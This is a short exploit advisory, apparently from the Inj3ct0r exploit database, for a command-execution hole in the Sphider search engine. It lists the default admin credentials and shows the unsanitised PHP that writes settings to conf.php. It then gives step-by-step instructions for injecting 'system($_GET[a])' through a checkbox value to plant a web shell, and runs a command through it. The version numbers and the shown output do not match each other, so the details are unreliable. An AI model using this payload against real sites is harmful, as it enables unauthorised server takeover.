Sphider 1.4.3 Command Execution

`===============================   
[sphider] <= 1.3.4 adding shell  
===============================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0   
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 0  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1  
  
#[+] Discovered By : Inj3ct0r  
#[+] Site : Inj3ct0r.com  
#[+] support e-mail : submit[at]inj3ct0r.com  
  
  
[~] Username and pass are stored in:  
  
http://site.com/sphider/admin/auth.php  
  
Default:  
  
PHP code:  
  
error_reporting(E_ERROR | E_PARSE);   
$admin = "admin";   
$admin_pw = "admin";   
  
  
  
[~] filled shells.  
  
Vulnerable code:  
  
PHP code:  
  
if ($_index_pdf=="") {   
$_index_pdf=0;   
}   
...   
fwrite($fhandle, "\n\n// Index pdf files\n");   
fwrite($fhandle,"$"."index_pdf = ".$_index_pdf. ";");   
  
The easiest is to do opera. Go to Source and change this:  
  
HTML code:  
  
<input name="_index_pdf" type="checkbox" value="0" id="index_pdf" >  
  
so  
  
HTML code:  
  
<input name="_index_pdf" type="checkbox" value="0; system($_GET[a])" id="index_pdf" >  
  
  
  
Save your settings.  
  
As a result, we have:  
  
PHP code:  
  
// Index pdf files   
$index_pdf = 0; echo($_GET[a]);   
  
  
http://site.com/sphider/settings/conf.php?a=ls -la  
  
ThE End =] Visit my proj3ct :  
  
http://inj3ct0r.com  
http://inj3ct0r.org  
http://inj3ct0r.net  
  
# ~ - [ [ : Inj3ct0r : ] ]`